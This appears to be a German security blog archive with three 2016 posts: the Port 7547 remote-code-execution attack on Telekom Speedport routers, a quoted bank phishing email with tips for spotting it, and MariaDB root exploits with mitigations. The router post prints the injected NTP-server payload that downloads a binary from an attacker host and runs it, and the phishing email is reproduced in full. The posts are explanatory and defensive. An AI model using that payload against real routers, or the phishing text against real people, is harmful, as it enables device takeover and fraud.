Category Archives: Security

Speedportrouter der DTAG von Sicherheitsloch betroffen

Posted on by

Jetzt ist es endlich final, die DSL-Speedportrouter der Deutschen Telekom haben ein Sicherheitsloch auf Port 7547 :

https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

und ein echt dreckiges dazu, weil die Kisten a) auf jeden Zugriff reagieren und b) eine Remote-Execution möglich ist. Der Hack funktioniert so:

<NewNTPServer1>
`cd /tmp;wget http://angreiferszum nachladen von code/1>;chmod 777 1;./1`
</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>

Natürlich gehört zu dem Request noch mehr, aber das sind die Grundlagen und aus dem Kontext kann man ersehen, daß hier einfach ein parameter aus dem Web genommen wird und an die Bash weitergereicht wird ohne den Inhalt auf Konsistenz zu prüfen. Ein einfacher Test, ob da ein Domainname/IP drinsteht, hätte das bundesweite Chaos vom Wochenende verhindert.

Die DSL-Router wurden Ihnen „proudly presented by Zyxel“ !!! Amis 😉

 

Erstmals eine (fast) fehlerfreie Scammeremail

Posted on by 
                                                             Datum: 02.11.2016

Guten Tag .......

aufgrund Aufgrund der steigenden Terrorgefahren und erhöhten Betrugsversuchen, 
hat Volksbanken Raiffeisenbanken die „Kenn deinen Kunden“ Strategie eingeführt. 
In regelmäßigen Abständen werden ihre persönlichen Daten erneut abgefragt um 
auf diesem Wege sicher zustellen, das Sie der rechtmäßige Eigentümer des 
Kundenkontos sind.

Über den unten angezeigt Button gelangen sie direkt zur erneuten Eingabe Ihrer
persönlichen Daten,Bitte achten Sie auf die korrekte Schreibweise und die 
Vollständigkeit Ihrer Daten. Sollten die angegebenen Daten nicht mit den bei 
uns hinterlegten übereinstimmen, sind wir dazu verpflichtet ihr Konto bis 
zur Verifikation ihrer Person über den Postweg zu sperren.

Weiter zur Bestätigung

Vielen Dank für Ihr Verständnis in dieser Angelegenheit.

Dies ist eine automatisch versendete Nachricht.

Bitte antworten Sie nicht auf dieses Schreiben, da die Adresse nur zur Versendung von E-Mails eingerichtet ist.

Auf den ersten Blick nicht schlecht 🙂 Wenn da nicht der unsachgemäße Einsatz eines „,“ wäre und ein „s“ statt „ß“ benutzt würde, man könnte glauben es wäre von einem Deutschen geschrieben.  Der Witz schlecht hin ist natürlich der Hinweis auf die korrekte Schreibweise 😀 Ja, Jungs, genau das moniere ich ja auch immer wieder 😀  In Grammatik haben Sie auch wieder nicht aufgepaßt:  Anreden immer groß Leute!

Die üblichen Checks greifen hier natürlich auch wieder:

Keine Anrede, außer der Emailadresse .. macht keine Bank.
Server steht irgendwo im Ausland, auch unwahrscheinlich.
Und natürlich wird genau das hier keine Bank per Email machen,
wenn doch ist das ein Grund die Bank zu wechseln !

Also wie immer: Ab in die digitale Mülltonne damit !

Noch keine Patches für MariabDB Root Exploits vorhanden

Posted on by

Für die u.a. bei The Hacker News gemeldeten Root-Exploits für MariaDB gibt es noch keine Patche im Fedora Repository, auch nicht im Unstable Bereich. Da hilft nur, den möglichen Exploit durch Verschleierung zuvermeiden.

Der bereits verfügbare Testexploit, legt Dateien im /tmp/ Ordner an. Das kann man schon mal verhindern, indem beim Start mit Systemd ein privates Temp-Verzeichnis benutzt wird. Das verhindert den Hack nicht, aber die kleinen Scriptkids werden an der Hürde scheitern 😉

Wenn man sein mariadb.service File nicht geändert hat, kommt es in Fedora bereits mit der richtigen Einstellung:

[Unit]
Description=MariaDB 10.0 database server

# Place temp files in a secure directory, not /tmp
PrivateTmp=true

In der my.cnf sollte man sowieso immer das Benutzen von Symbolischen Links abschalten, eine Serverdatenbank braucht das i.d.R. nicht:

symbolic-links=0

Damit kann man auch ohne Patch CVE-2016-6662 nicht ausnutzen um seine Rechte zu eskalieren. Wer bislang „mariadb-10.0.27-1“ noch nicht eingespielt hat, sollte das trotzdem dringend nachholen.

Gegen die Lücken CVE-2016-6663 und CVE-2016-6664 sind die Patche bei Fedora noch in Arbeit. Leider ist auch im Koji noch keine Testversion ersichtlich. Die letzten Builds stammen vom Anfang des Monats, welche zudem die CVE Patche nicht enthalten. Dies kann natürlich daher rühren, daß diese Versionen nicht anfällig waren, da es sich um den 10.1.17/18 er Zweig von Mariadb handelt.